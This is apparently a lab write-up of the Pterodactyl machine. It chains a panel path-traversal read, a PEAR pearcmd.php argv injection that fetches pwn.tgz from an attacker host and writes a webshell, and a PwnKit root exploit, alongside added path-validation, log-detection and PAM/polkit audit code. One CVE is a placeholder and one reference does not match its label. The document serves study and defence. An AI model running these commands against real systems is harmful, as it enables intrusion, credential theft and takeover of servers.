---
layout: default
title: Pterodactyl
parent: Insane Machines
grand_parent: Machines
permalink: /machines/insane/pterodactyl/
---
| Property | Value |
|---|---|
| OS | openSUSE Linux |
| Difficulty | Insane |
| Release | 2026-05-16 |
| Tags | #pterodactyl-panel #cve-2025-49132 #pear #pearcmd #lfi #pam #polkit #suse |
Pterodactyl targets the Pterodactyl game-server management panel running on openSUSE. The chain is:
- Directory traversal in the Pterodactyl panel (CVE-2025-49132) for arbitrary file read / panel takeover
- PEAR `pearcmd.php` LFI-to-RCE technique: `register_argc_argv` enabled in `php.ini` -> `pearcmd.php` argument injection writes a webshell
- PAM / Polkit privilege escalation chain for root
openSUSE's path conventions and PAM stack differ from Debian/Ubuntu, complicating off-the-shelf techniques.
- CVE-2025-49132 - Pterodactyl panel path traversal in file management endpoint
- PEAR `pearcmd.php` LFI -> RCE (requires `register_argc_argv = On` and PEAR installed)
  - `php.ini` `register_argc_argv` enables `$argv` to be read from the URL query string
  - `pearcmd.php install --installroot=/path/to/webroot package.tgz` writes attacker-controlled `package.tgz` content into the webroot
- PAM stack abuse on openSUSE (`/etc/pam.d/`)
- Polkit/pkexec known CVEs (CVE-2021-4034 PwnKit, CVE-2025-XXX per Pterodactyl patch state)
```bash
nmap -p- --min-rate=10000 -sV -sC pterodactyl.htb
# 22 ssh
# 443 https -> Pterodactyl Panel
```

Identify the Pterodactyl version on `/api/application` or in the page metadata.
```bash
curl -sk "https://pterodactyl.htb/api/client/servers/<server-id>/files/contents?file=../../../../../../etc/passwd" \
  -H "Authorization: Bearer <jwt>"
```

Use the traversal to read the panel `.env` and recover `APP_KEY`, DB credentials, and mail SMTP credentials.
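The bug class behind the file-contents endpoint, shown as an added example (this is illustrative code, not Pterodactyl's own source or its patch): `vulnerable_resolve` joins the `file` parameter straight onto the server's volume root, so `../` sequences walk out of it, while `safe_resolve` canonicalises the result and refuses anything that leaves the root. The root path and file names are constructed.

```python
"""Resolve a user-supplied file path inside a per-server volume root.

Added example, not Pterodactyl's code. A real implementation should
additionally os.path.realpath() the candidate after this check so that
symlinks planted inside the volume cannot point back outside it.
"""
import posixpath


def vulnerable_resolve(server_root: str, requested: str) -> str:
    """Naive join: '../' in `requested` escapes server_root."""
    return posixpath.normpath(posixpath.join(server_root, requested))


def safe_resolve(server_root: str, requested: str) -> str:
    """Return the canonical path if it stays under server_root, else raise."""
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    root = posixpath.normpath(server_root)
    # Treat the request as relative even if it starts with '/'.
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    # The prefix check must include the trailing separator, otherwise
    # /srv/volumes/abc-evil would pass for root /srv/volumes/abc.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"path escapes server root: {requested!r}")
    return candidate


if __name__ == "__main__":
    root = "/srv/volumes/abc"  # constructed volume root
    print("vulnerable:", vulnerable_resolve(root, "../../../../../../etc/passwd"))
    for req in ("config/server.properties", "../../../../../../etc/passwd"):
        try:
            print("safe:", safe_resolve(root, req))
        except ValueError as exc:
            print("rejected:", exc)
```

The same prefix check must run on every file-management route (read, write, rename, archive), not only on the read endpoint; a single unchecked route is enough to reproduce the traversal.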
`register_argc_argv = On` in `php.ini` means PHP populates `$argv` from the query string. When `pearcmd.php` is reachable via LFI, the query-string members become its CLI arguments:
```bash
# Upload a malicious .tgz via attacker HTTP server containing a PHP webshell
python3 -m http.server 80

# Trigger LFI -> pearcmd.php with install command
curl -sk "https://pterodactyl.htb/?+config-create+/&file=/usr/share/pear/pearcmd.php&+install+-R+/var/www/html+http://10.10.14.5/pwn.tgz"

# Or argv-injection variant:
curl -sk "https://pterodactyl.htb/index.php?+install+-R+/var/www/html+http://10.10.14.5/pwn.tgz&file=/usr/share/pear/pearcmd.php"
```

Browse to the written webshell -> RCE as the nginx/pterodactyl user.
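Both request shapes above (the traversal read and the `pearcmd.php` argv injection) leave a recognisable trace in the web server's access log. The following is an added detection example, not part of the original write-up: it parses nginx combined-format lines, URL-decodes the request target twice to catch double encoding, and flags traversal sequences in any query value and bare `+`-prefixed query members (the PEAR argv form). The log lines are constructed, not captured from a real host.

```python
"""Flag Pterodactyl traversal reads and PEAR pearcmd.php argv injection
in nginx access logs. Added example; sample log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# nginx "combined" format: ip - user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: one benign file read, one traversal, one pearcmd
# argv injection, one unrelated login request.
SAMPLE_LOG = """\
10.10.14.5 - - [16/May/2026:10:01:02 +0000] "GET /api/client/servers/1a2b/files/contents?file=config%2Fserver.properties HTTP/1.1" 200 512 "-" "curl/8.5"
10.10.14.5 - - [16/May/2026:10:01:09 +0000] "GET /api/client/servers/1a2b/files/contents?file=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1881 "-" "curl/8.5"
10.10.14.5 - - [16/May/2026:10:02:41 +0000] "GET /index.php?+install+-R+/var/www/html+http://10.10.14.5/pwn.tgz&file=/usr/share/pear/pearcmd.php HTTP/1.1" 200 93 "-" "curl/8.5"
10.10.14.7 - - [16/May/2026:10:03:00 +0000] "GET /auth/login HTTP/1.1" 200 2104 "-" "Mozilla/5.0"
"""


def classify_target(target: str) -> list[str]:
    """Return a list of finding labels for one raw request target."""
    findings = []
    decoded = unquote(unquote(target))  # second pass catches %25-encoding
    query = urlsplit(decoded).query
    if "pearcmd.php" in decoded:
        findings.append("pearcmd-lfi")
    # A query member that starts with '+' and has no key is the PEAR argv
    # injection shape (register_argc_argv turns it into a CLI argument).
    if re.search(r"(?:^|&)\+", query):
        findings.append("pear-argv-injection")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "../" in value or "..\\" in value:
            findings.append(f"traversal:{key}")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, raw target, findings) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_target(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings), target)
```

Pair the log rule with a configuration check: `php -i | grep register_argc_argv` should report `Off` on any web-facing PHP-FPM pool, and the PEAR directory should not be present on a production panel host at all.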
Recover the Pterodactyl DB credentials and dump MySQL for the admin users' password hashes. Cracked or reused passwords pivot to a real OS user via SSH.
Enumerate openSUSE specifics:

```bash
ls -la /etc/pam.d/
cat /etc/pam.d/common-auth-pc
# Look for misconfigured "auth sufficient pam_listfile.so" or world-writable conf
pkexec --version
# 0.120 -> PwnKit CVE-2021-4034 if unpatched
```

PwnKit:

```bash
git clone https://github.com/berdav/CVE-2021-4034 && cd CVE-2021-4034
make && ./cve-2021-4034
# euid=0
```

If PwnKit is patched, look for polkit rules (`/etc/polkit-1/rules.d/`) granting the wheel group `org.freedesktop.systemd1.manage-units` or similar, then start a malicious systemd user-service.
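The enumeration above maps directly onto a host-side audit. The script below is an added example (not from the original page) that checks the three things the write-up looks for: world-writable or `auth sufficient pam_listfile.so` entries under `/etc/pam.d/`, polkit `.rules` files that answer `polkit.Result.YES` for `org.freedesktop.systemd1.manage-units`, and a `pkexec` version on the pre-fix 0.120 line. All inputs are constructed in-memory samples so it runs offline; on a real host you would feed it `os.stat()` modes and file contents.

```python
"""Audit the openSUSE PAM / polkit / pkexec surface described above.
Added example with constructed sample data, not from a real host."""
import re
import stat

# Constructed samples. Keys are paths; PAM values are (mode, content).
SAMPLE_PAM = {
    "/etc/pam.d/common-auth-pc": (0o644, "auth required pam_env.so\nauth required pam_unix.so try_first_pass\n"),
    "/etc/pam.d/sshd": (0o666, "auth sufficient pam_listfile.so item=user sense=allow file=/etc/ssh/allowed\nauth include common-auth\n"),
}
SAMPLE_POLKIT_RULES = {
    "/etc/polkit-1/rules.d/50-default.rules": 'polkit.addAdminRule(function(action, subject) { return ["unix-group:wheel"]; });\n',
    "/etc/polkit-1/rules.d/90-units.rules": (
        "polkit.addRule(function(action, subject) {\n"
        '  if (action.id == "org.freedesktop.systemd1.manage-units" && subject.isInGroup("wheel")) {\n'
        "    return polkit.Result.YES;\n  }\n});\n"
    ),
}
SAMPLE_PKEXEC_VERSION = "pkexec version 0.120"


def audit_pam(files: dict) -> list[tuple[str, str]]:
    """Flag world-writable PAM files and 'auth sufficient pam_listfile.so' lines."""
    findings = []
    for path, (mode, content) in files.items():
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        for line in content.splitlines():
            fields = line.split()
            if (len(fields) >= 3 and fields[0] == "auth"
                    and fields[1] == "sufficient"
                    and fields[2].startswith("pam_listfile.so")):
                findings.append((path, "auth sufficient pam_listfile.so"))
    return findings


RULE_YES = re.compile(r"polkit\.Result\.YES")
RULE_UNITS = re.compile(r'"org\.freedesktop\.systemd1\.manage-units"')


def audit_polkit_rules(rules: dict) -> list[str]:
    """Return .rules files that both name manage-units and return YES.

    This is a textual heuristic; polkit rules are JavaScript, so a hit
    means 'read this file', not proof that the grant is unconditional."""
    return [path for path, body in rules.items()
            if RULE_YES.search(body) and RULE_UNITS.search(body)]


def pkexec_needs_review(version_output: str) -> bool:
    """True when `pkexec --version` reports a version <= 0.120.

    Distributions backport the CVE-2021-4034 fix without bumping the
    version string, so a True result is a prompt to check the package
    changelog, not evidence that PwnKit works."""
    m = re.search(r"(\d+)(?:\.(\d+))?", version_output)
    if not m:
        raise ValueError(f"unrecognised version string: {version_output!r}")
    major = int(m.group(1))
    minor = int(m.group(2)) if m.group(2) else 0
    return (major, minor) <= (0, 120)


if __name__ == "__main__":
    for path, issue in audit_pam(SAMPLE_PAM):
        print("PAM:", path, issue)
    for path in audit_polkit_rules(SAMPLE_POLKIT_RULES):
        print("polkit:", path, "grants manage-units with Result.YES")
    print("pkexec needs review:", pkexec_needs_review(SAMPLE_PKEXEC_VERSION))
```

On a patched openSUSE host the version check is expected to fire anyway; the authoritative answer is `rpm -q --changelog polkit | grep -i 4034`, which shows whether the backported fix is present.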
- `register_argc_argv = On` + reachable `pearcmd.php` = guaranteed RCE primitive. This is a 2018-era trick still landing on 2026 Insane boxes.
- Pterodactyl is widely deployed for game-server hosting; its file-management endpoints are a high-value target.
- openSUSE breaks assumptions: Polkit, PAM, default paths all differ from Debian/Ubuntu. Always read `/etc/os-release` first.
- PwnKit (CVE-2021-4034) remains one of the most reliable Linux LPEs in 2026 due to slow patching cadence on niche distros.
- PEAR `pearcmd.php` LFI-to-RCE technique: https://www.synacktiv.com/publications/exploiting-php-phar-deserialization-vulnerabilities-part-1.html (related)
- Pterodactyl Panel: https://pterodactyl.io/
- PwnKit CVE-2021-4034: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034